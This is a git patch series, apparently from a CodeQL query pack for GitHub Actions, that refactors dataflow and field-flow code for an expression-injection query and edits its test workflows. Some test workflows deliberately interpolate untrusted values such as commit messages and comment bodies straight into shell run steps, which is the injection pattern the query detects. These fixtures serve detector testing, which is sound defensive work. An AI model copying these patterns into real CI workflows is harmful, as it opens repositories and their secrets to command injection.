+ FieldContent() { this = TFieldContent(name) } + + /** Gets the name of the field. */ + string getName() { result = name } + + override string toString() { result = name } } diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml index a3f687a0611..3cd0871c883 100644 --- a/ql/lib/ext/tj-actions-changed-files.model.yml +++ b/ql/lib/ext/tj-actions-changed-files.model.yml @@ -3,26 +3,26 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unmerged_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.added_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.changed_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.copied_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.modified_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.type_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.unknown_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.unmerged_files", "*", "PR changed files" ] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 6860f091d5e..4b47a154a1d 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or - sinkNode(this, "expression-injection") + externallyDefinedSink(this, "expression-injection") } } @@ -37,5 +37,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + "Potential injection from the ${{ " + sink.getNode().asExpr().(CtxAccessExpr).getExpression() + " }}, which may be controlled by an external user." diff --git a/ql/src/test/.github/workflows/ci-cleanup.yml b/ql/src/test/.github/workflows/ci-cleanup.yml deleted file mode 100644 index 11a101cef49..00000000000 --- a/ql/src/test/.github/workflows/ci-cleanup.yml +++ /dev/null @@ -1,47 +0,0 @@ -run-name: Cleanup ${{ github.head_ref }} -on: - pull_request_target: - types: labeled - paths: - - "images/**" - -jobs: - clean_ci: - name: Clean CI runs - runs-on: ubuntu-latest - permissions: - actions: write - steps: - - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - shell: pwsh - run: | - $startDate = Get-Date -UFormat %s - $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") - while ($true) { - $continue = $false - foreach ($wf in $workflows) { - $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" - $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } - $skippedIds | ForEach-Object { - $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" - Invoke-Expression -Command $deleteCommand - } - $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" - $pending = Invoke-Expression -Command $pendingCommand - if ($pending -gt 0) { - Write-Host "Pending for ${wf}.yml: $pending run(s)" - $continue = $true - } - } - if ($continue -eq $false) { - Write-Host "All done, exiting" - break - } - $curDate = Get-Date -UFormat %s - if (($curDate - $startDate) -gt 60) { - Write-Host "Reached timeout, exiting" - break - } - Write-Host "Waiting 5 seconds..." - Start-Sleep -Seconds 5 diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml index 6239f0490d1..9ebb7bbf2be 100644 --- a/ql/src/test/.github/workflows/image_link_generator.yml +++ b/ql/src/test/.github/workflows/image_link_generator.yml @@ -14,35 +14,39 @@ jobs: - name: Extract and Clean Initial URL id: extract-url + env: + BODY: ${{ github.event.comment.body }} run: | - INITIAL_URL=$(echo "${{ github.event.comment.body }}" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') echo "Cleaned Initial URL: $INITIAL_URL" echo "::set-output name=initial_url::$INITIAL_URL" - name: Get Redirected URL with Debugging id: curl + env: + INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "${{ steps.extract-url.outputs.initial_url }}") + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") echo "Curl Command Executed" echo "Redirected URL: $REDIRECTED_URL" echo "::set-output name=redirected_url::$REDIRECTED_URL" - name: Trim URL after PNG id: trim-url + env: + REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} run: | - TRIMMED_URL=$(echo "${{ steps.curl.outputs.redirected_url }}" | sed 's/\(.*\.png\).*/\1/') + TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') echo "Trimmed URL: $TRIMMED_URL" echo "::set-output name=trimmed_url::$TRIMMED_URL" - - name: Output Final Trimmed URL - run: | - echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" - - name: Update Comment with New URL + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + COMMENT_URL: ${{ github.event.comment.url }} + ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} run: | - COMMENT_URL="${{ github.event.comment.url }}" NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - ORIGINAL_COMMENT_BODY="${{ github.event.comment.body }}" UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') @@ -51,5 +55,3 @@ jobs: -H "Accept: application/vnd.github.v3+json" \ "${COMMENT_URL}" \ -d "$PAYLOAD" - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/src/test/.github/workflows/image_link_generator_2.yml b/ql/src/test/.github/workflows/image_link_generator_2.yml deleted file mode 100644 index 01d33249251..00000000000 --- a/ql/src/test/.github/workflows/image_link_generator_2.yml +++ /dev/null @@ -1,61 +0,0 @@ -name: Image URL Processing - -on: - issue_comment: - types: [created] - -jobs: - process-image-url: - runs-on: ubuntu-latest - if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') - steps: - - name: Checkout - uses: actions/checkout@v2 - - - name: Extract and Clean Initial URL - id: extract-url - env: - BODY: ${{ github.event.comment.body }} - run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" - - - name: Get Redirected URL with Debugging - id: curl - env: - INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} - run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") - echo "Curl Command Executed" - echo "Redirected URL: $REDIRECTED_URL" - echo "::set-output name=redirected_url::$REDIRECTED_URL" - - - name: Trim URL after PNG - id: trim-url - env: - REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} - run: | - TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') - echo "Trimmed URL: $TRIMMED_URL" - echo "::set-output name=trimmed_url::$TRIMMED_URL" - - - name: Output Final Trimmed URL - run: | - echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" - - - name: Update Comment with New URL - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - COMMENT_URL: ${{ github.event.comment.url }} - ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} - run: | - NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" - - PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') - curl -X PATCH \ - -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ - -H "Accept: application/vnd.github.v3+json" \ - "${COMMENT_URL}" \ - -d "$PAYLOAD" diff --git a/ql/src/test/.github/workflows/image_link_generator_3.yml b/ql/src/test/.github/workflows/image_link_generator_3.yml deleted file mode 100644 index 70aece4f7cf..00000000000 --- a/ql/src/test/.github/workflows/image_link_generator_3.yml +++ /dev/null @@ -1,27 +0,0 @@ -name: Image URL Processing - -on: - issue_comment: - types: [created] - -jobs: - process-image-url: - runs-on: ubuntu-latest - if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') - steps: - - name: Checkout - uses: actions/checkout@v2 - - - name: Extract and Clean Initial URL - id: source - env: - BODY: ${{ github.event.comment.body }} - run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" - - - name: Get Redirected URL with Debugging - id: sink - run: | - echo ${{ steps.source.outputs.initial_url }} diff --git a/ql/src/test/.github/workflows/inter1.yml b/ql/src/test/.github/workflows/inter-job.yml similarity index 100% rename from ql/src/test/.github/workflows/inter1.yml rename to ql/src/test/.github/workflows/inter-job.yml diff --git a/ql/src/test/.github/workflows/simple1.yml b/ql/src/test/.github/workflows/simple1.yml index f61e763f188..94e8be89bdc 100644 --- a/ql/src/test/.github/workflows/simple1.yml +++ b/ql/src/test/.github/workflows/simple1.yml @@ -5,12 +5,15 @@ jobs: runs-on: ubuntu-latest steps: - - id: source + - id: summary uses: mad9000/actions-find-and-replace-string@3 with: source: ${{ github.event.head_commit.message }} find: 'foo' replace: '' - - id: sink + - id: flow run: | - echo "${{steps.source.outputs.value}}" + echo "${{steps.summary.outputs.value}}" + - id: no-flow + run: | + echo "${{steps.summary.outputs.foo}}" diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index f3d79b97bc2..b40f5eb6ac0 100644 --- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -33,4 +33,10 @@ jobs: echo "$file was changed" done + - name: List all changed files + id: no-flow + run: | + for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" + done diff --git a/ql/src/test/.github/workflows/test.yml b/ql/src/test/.github/workflows/test.yml index 554a09f2105..628b6e6f1bf 100644 --- a/ql/src/test/.github/workflows/test.yml +++ b/ql/src/test/.github/workflows/test.yml @@ -22,7 +22,9 @@ jobs: run: | Write-Output "::set-output name=MSG::$ENV{BODY}" - id: step2 - run: echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + env: + MSG: ${{steps.step1.outputs.MSG}} + run: echo "test=$MSG" >> "$GITHUB_OUTPUT" job2: runs-on: ubuntu-latest @@ -32,5 +34,4 @@ jobs: needs: job1 steps: - - env: - run: echo ${{needs.job1.outputs.job_output}} + - run: echo ${{needs.job1.outputs.job_output}} From ebaac5f5cb16ec9aba60e2fdc75bba13b08811ab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:03:11 +0100 Subject: [PATCH 0030/1267] fix: enforce input,output,env prefixes in MaD --- .../codeql/actions/dataflow/ExternalFlow.qll | 26 +++++++++++-------- ql/lib/ext/PLACEHOLDER.model.yml | 7 +++++ .../frabert_replace-string-action.model.yml | 4 +-- ..._actions-find-and-replace-string.model.yml | 4 +-- 4 files changed, 26 insertions(+), 15 deletions(-) create mode 100644 ql/lib/ext/PLACEHOLDER.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 38b964110c7..6446fbb5572 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -50,22 +50,22 @@ predicate externallyDefinedSource(DataFlow::Node source, string sourceType, stri ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env\\.", "")) + then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") - then - // 'output.' is the default qualifier - source.asExpr() = uses + then source.asExpr() = uses else none() ) and sourceType = kind ) } -predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { +predicate externallyDefinedStoreStep( + DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c +) { exists(UsesExpr uses, string action, string version, string input, string output | - c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and summaryModel(action, version, input, output, "taint") and + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -74,10 +74,11 @@ predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, Dat ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) else - // 'input.' is the default qualifier - pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) + if input.trim().matches("input.%") + then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + else none() ) and succ.asExpr() = uses ) @@ -87,8 +88,11 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("input\\.", "")) - else sink.asExpr() = uses.getArgumentExpr(input.trim()) + then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + else + if input.trim().matches("input.%") + then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + else none() ) and sinkModel(action, version, input, kind) and uses.getCallee() = action.toLowerCase() and diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/PLACEHOLDER.model.yml new file mode 100644 index 00000000000..ef916067967 --- /dev/null +++ b/ql/lib/ext/PLACEHOLDER.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - ["","","",""] + diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 76ce81b394e..79fd5c76e4a 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["frabert/replace-string-action", "*", "string", "replaced", "taint"] - - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"] diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 46a577d2f7e..332527813a4 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"] - - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"] From 494fb2470e1c399699b4dab1176ac573f9947ac2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:05:13 +0100 Subject: [PATCH 0031/1267] fix: refactor local, read and store steps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 74 ++++++------------- 2 files changed, 22 insertions(+), 54 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 9def461900e..faa7c4c3ebe 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -40,7 +40,7 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" */ -predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { +predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(RunExpr r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 55fda038789..045910ed676 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -133,9 +133,9 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as jobs, env or inputs name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() or - name = any(JobsCtxAccessExpr a).getFieldName() + name = any(NeedsCtxAccessExpr a).getFieldName() } /** @@ -188,11 +188,12 @@ class ArgumentPosition extends string { predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } /** - * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself - * But only for those cases where the step output is defined externally in a MaD specification. - * The reason for this is that we don't currently have a way to specify that a source starts with a non-empty access - * path so the easiest thing is to add the corresponding read steps of that field as local flow steps as well. - * e.g. ${{ steps.step1.output.foo }} + * Holds if there is a local flow step between a ${{ steps.xxx.outputs.yyy }} expression accesing a step output field + * and the step output itself. But only for those cases where the step output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(StepStmt astFrom, StepsCtxAccessExpr astTo | @@ -204,19 +205,6 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } -/** - * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself - * e.g. ${{ needs.job1.output.foo }} or ${{ jobs.job1.output.foo }} - */ -predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, CtxAccessExpr astTo | - astFrom = nodeFrom.asExpr() and - astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom and - (astTo instanceof NeedsCtxAccessExpr or astTo instanceof JobsCtxAccessExpr) - ) -} - /** * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} @@ -252,7 +240,6 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or - jobsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } @@ -272,17 +259,12 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } -/** - * A read step to read the value of a ReusableWork uses step and connect it to its - * corresponding JobOutputAccessExpr - */ -predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { - exists(NeedsCtxAccessExpr expr, string fieldName | - expr.usesReusableWorkflow() and - expr.getRefExpr() = node1.asExpr() and - expr.getFieldName() = fieldName and - expr = node2.asExpr() and - c = any(FieldContent ct | ct.getName() = fieldName) +predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { + exists(CtxAccessExpr access | + (access instanceof NeedsCtxAccessExpr or access instanceof StepsCtxAccessExpr) and + c = any(FieldContent ct | ct.getName() = access.getFieldName()) and + node1.asExpr() = access.getRefExpr() and + node2.asExpr() = access ) } @@ -291,24 +273,14 @@ predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. */ -predicate readStep(Node node1, ContentSet c, Node node2) { - // TODO: Extract to its own predicate - exists(StepsCtxAccessExpr access | - c = any(FieldContent ct | ct.getName() = access.getFieldName()) and - node1.asExpr() = access.getRefExpr() and - node2.asExpr() = access - ) - or - reusableWorkflowReturnReadStep(node1, node2, c) -} +predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node1, node2, c) } /** - * A store step to store the value of a ReusableWorkflowStmt output expr into the return node (node2) + * A store step to store an output expression (node1) into its OutputsStm node (node2) * with a given access path (fieldName) */ -predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) { - exists(ReusableWorkflowStmt stmt, OutputsStmt out, string fieldName | - out = stmt.getOutputsStmt() and +predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { + exists(OutputsStmt out, string fieldName | node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) @@ -321,13 +293,9 @@ predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) * contains the value of `node1`. */ predicate storeStep(Node node1, ContentSet c, Node node2) { - reusableWorkflowReturnStoreStep(node1, node2, c) - or - // TODO: rename to xxxxStoreStep - externallyDefinedSummary(node1, node2, c) - or - // TODO: rename to xxxxStoreStep - runEnvToScriptstep(node1, node2, c) + fieldStoreStep(node1, node2, c) or + externallyDefinedStoreStep(node1, node2, c) or + runEnvToScriptStoreStep(node1, node2, c) } /** From 90d1ae4a05208f1b6a7c1b16f860e72b232288c3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:06:28 +0100 Subject: [PATCH 0032/1267] fix: simplify Ast --- ql/lib/codeql/actions/Ast.qll | 30 +++---------------- .../actions/controlflow/internal/Cfg.qll | 6 +--- 2 files changed, 5 insertions(+), 31 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 087b7f19e62..e5f9e35a4a9 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -149,7 +149,7 @@ class JobStmt extends Statement instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + OutputsStmt getOutputsStmt() { result = this.(Actions::Job).lookup("outputs") } /** * Reusable workflow jobs may have Uses children @@ -166,28 +166,6 @@ class JobStmt extends Statement instanceof Actions::Job { } } -/** - * Declaration of the outputs for the job. - * eg: - * out1: ${steps.foo.bar} - * out2: ${steps.foo.baz} - */ -class JobOutputStmt extends Statement instanceof YamlMapping { - JobStmt job; - - JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } - - YamlMapping asYamlMapping() { result = this } - - /** - * Gets a specific value expression - * eg: ${steps.foo.bar} - */ - Expression getOutputExpr(string id) { - this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = id), result) - } -} - /** * A Step is a single task that can be executed as part of a job. */ @@ -435,9 +413,9 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { job.getLocation().getFile() = this.getLocation().getFile() and ( // regular jobs - job.getOutputStmt().getOutputExpr(fieldName) = result + job.getOutputsStmt() = result or - // jobs calling reusable workflows + // reusable workflow calling jobs job.getUsesExpr() = result ) } @@ -464,7 +442,7 @@ class JobsCtxAccessExpr extends CtxAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputStmt().getOutputExpr(fieldName) = result + job.getOutputsStmt() = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8d044c827a2..8808fb0afe5 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -231,7 +231,7 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { rank[i](Expression child, Location l | ( child = super.getAStepStmt() or - child = super.getOutputStmt() or + child = super.getOutputsStmt() or child = super.getUsesExpr() ) and l = child.getLocation() @@ -243,10 +243,6 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { - override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } -} - private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { override ControlFlowTree getChildNode(int i) { result = From f65587e5cfa8b9d00dcb91d98df4a720bcc384a1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 17:08:13 +0100 Subject: [PATCH 0033/1267] feat(fieldflow): Refactor flow through Job outputs MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Job output should flow to the “key†(YamlString) and be read from there from the JobOutputAccessExpr. - NeedsCtxAccessExpr.getRefExpr should point to the UsesExpr(RW calling Job) or to the OutputsStmt(Regular Job). - JobsCtxAccessExpr.getRefExpr should point to the OutputsStmt(Regular Job). - Create storeStep from OutputExpr to OutputStmt using output var name as the field name. - Create a readStep for CtxAccessExpr to read the referenced fields from the job outputs. --- .../dataflow/internal/DataFlowPrivate.qll | 23 +++++++++++++------ 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 